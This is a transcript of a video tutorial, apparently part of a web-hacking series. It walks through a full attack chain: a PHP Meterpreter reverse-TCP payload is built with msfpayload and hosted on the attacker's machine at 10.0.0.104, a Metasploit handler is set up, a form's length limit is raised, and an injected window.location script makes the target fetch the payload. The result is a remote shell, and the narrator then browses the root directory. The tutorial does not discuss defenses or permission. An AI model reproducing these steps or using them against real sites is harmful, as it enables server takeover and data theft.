All right, pop, pop, poppity pop. We're going to go ahead and do another server drop. Welcome back to another web hacking series. Today we're going to do part 3 of our cross-site scripting series. And this one here, we're going to go ahead and get a little malicious than the rest of them. The previous ones we just did a pop-up for the first one. And then the second tutorial, we did a session ID stealing, as it were. So today we're going to go ahead and directly pop the box straight from their web forum. Yeah, baby. So in order to do that, we're going to have to go ahead and create a payload. So we're going to be using a toolkit called Metasploit, and Metasploit is kind of the all one-stop shop for Hacker's Paradise, where pretty much you can do everything from within this. You can scan, you got payloads, you got exploits, you got vulnerability stuff in it. So you basically can own a box directly from Metasploit and only use Metasploit in some cases. And we're going to use that here today. And inside of it, they have a variety of different ways to make payloads. Old school way of doing it is one called MSF payload. I'm going to use that one instead of MSF Venom today. So in case you guys have an older version that you're using. So we're going to say MSF payload. And I'm going to go ahead and say PHP/meterpreter. And don't worry if you don't know what I'm typing. I'm going to explain it here in just a moment. As soon as I'm done typing, I'll go over what I'm typing in here. So we're going to do a reverse TCP for Meterpreter. My local host is the machine that I'm attacking from, which is this machine, Kali Linux, and that's at 10.0.0.104. And our local port that we're going to open up to get the traffic in will be 4444. And we're going to do a raw packet, which is a capital R. And I'm going to go ahead and send it over to my web server. And let's call it, I don't know, we'll call it Wingnut. Wingnut.php sounds like a nice, even name. And we'll hit enter. So what am I doing here? Well, we're utilizing a toolkit called MSF Payload out of the Metasploit framework. And we're making a PHP reverse shell. If you ever seen that movie Born, the new version of Born, they talk about the PHP reverse shells on that one, where they actually do it against I forget who it was, Nikki. I can't remember who it was, but they were doing that, uploading a reverse shell at the beginning of the movie, which I thought was kind of cool because it kind of fits in with this lesson for today. So the Meterpreter is something that is a command shell that is specialized, and it's only available for this framework. So it's kind of like a regular terminal, but with a lot more functionality. And the reverse DCP is to try to go ahead and bypass a stateful firewall. Now, the local host is the machine I'm attacking from because it needs a way to connect back to in order for me to control the guy's machine. So L port is the port I'm opening up for that to happen on as well. R means I'm making a raw packet for PHP. var www is the location of a web page server called Apache. And I have an Apache server in this machine built in. And you can see right here, I called it wingnut.php. And I've already started my web server, and I've already started this thing called a Metasploit framework. So I'm going to pop on over here for a second, and I'm going to scroll all the way up to the top for a moment and show you at the beginning that I had started my database here, and then I started the Metasploit tool that I want to use here, and then I started my web server here, and then I started the console for me to control and type in stuff in the Metasploit framework, okay? So now we're going to come all the way back down here, and I'm going to make something called a handler. So it's an exploit called handler. I'm going to say multi/handler, and this is to be able to catch the virus, as it were. So we're going to say handler, and I'll probably do a web series on this Metasploit at a later time because it's pretty cool stuff. So we're going to go ahead and use multi-handler, and we're going to go ahead and set payload. And not pat load. Let's see here. Set payload PHP/reverse. Oops, I'm having a hard time typing today. Meterpreter/reverse _TCP. And then I'm going to set the local host to 10.0.0.104, which is my attacking machine. And let me verify that I actually put that as that over here. And I did. Good. I don't need to set the port because the L port is already set by default at 4444. So I'm going to leave that be. And I'm going to type in exploit. And that is going to sit there waiting for badness to happen. What badness may you say? Well, this badness, yeah. So we're going to send that over. and download it directly into the guy's web forum and run it directly from his web forum. So we'll go over here to XSS, click in there. Then what we're going to do is we're going to put our script in here, our JavaScript for XSS. So we're going to start with script as our tag, and then we're going to say window.location. I'm going to leave it up to you guys to go to w3schools.com and find out exactly what window.location does for you. So I'll do a little bit of homework for you there. So we're going to say window.location equals, in quotations, http://10.0.0.104. This is my attacking machine, Cali. That's the address, but my web server is running from there, so that's the address to my web server. And then the file that we had made, which is the virus, is wingnut, and wingnut dot, oops, looks like we can't go any further than that, which is interesting. So what we're going to do is I'm going to go ahead and right-click, and we're going to inspect the element. And you can do this on pretty much any site, client side. And let's see where it says 50 right here, max length 50. Well, that's just not going to do. We're going to change that bad boy to 200. Oh, yeah. So now we should be able to continue typing. And we can. Very cool. So now we got, let's see, script window.location equals http://10.0.104/wingnut.php. Let's end our script here. Okay. End our script tag. So what should happen is this. When I click Sign Guestbook, it should jump into the weight and arms of my multi-handler, and it should give me a interpreter prompt. If we see a interpreter prompt, that means I have now broken into this guy's server. So not just the web page, we're talking the entire server that the actual web page runs on. You ready to try it? Let's go ahead. Sign Guestbook. Interpreter pop, pop, pop. Another server drop, baby. Loving life. And just to verify, let's do a sysinfo. And there we go. Loving it. So we see here, it is PHP. It is a Linux machine that the guy is on. He is on a Debian type of machine. And 3.18 is his deal there. Very cool. Now, if you do a help file here, you'll see some of the things that you can do. You can get shell access. You can go ahead and list processes, execute, get environments. You can port forward. Let me scroll up here a little bit. Yeah, see, I can upload files to the guy's machine. I can download files from the guy's machine, make directories, edit, all kinds of goodies there. Okay, I can go ahead and run stuff, interact with, get a Ruby on Rails shell script in mode, all kinds of cool stuff with this interpreter prompt. And it's just as easy as saying shell, for instance, and getting shell access. Here I can do an ls. I can see the guy's web server is this one here. And from here, I can navigate to different areas like cd/root, and then print working directory, verify that I'm in root, and see if there's anything in the root of that guy's machine. Okay, so pretty awesome stuff. Tearing it up, loving life, killing it. And we just popped into the box. So that is basically, let me go ahead and get out of that, terminate that channel. That is basically how you gain access to a guy's box just by using cross-site scripting in the web form that the guy hosts on his home page, using Metasploit and all kinds of other good stuff like that. So I hope you guys enjoyed that, and when we get back on other videos, we'll go ahead and discuss a little bit more what we can do with some other web application attacks. For now, though, thank you for watching. Go ahead and check out for any other videos that are coming in the future. Have a good night.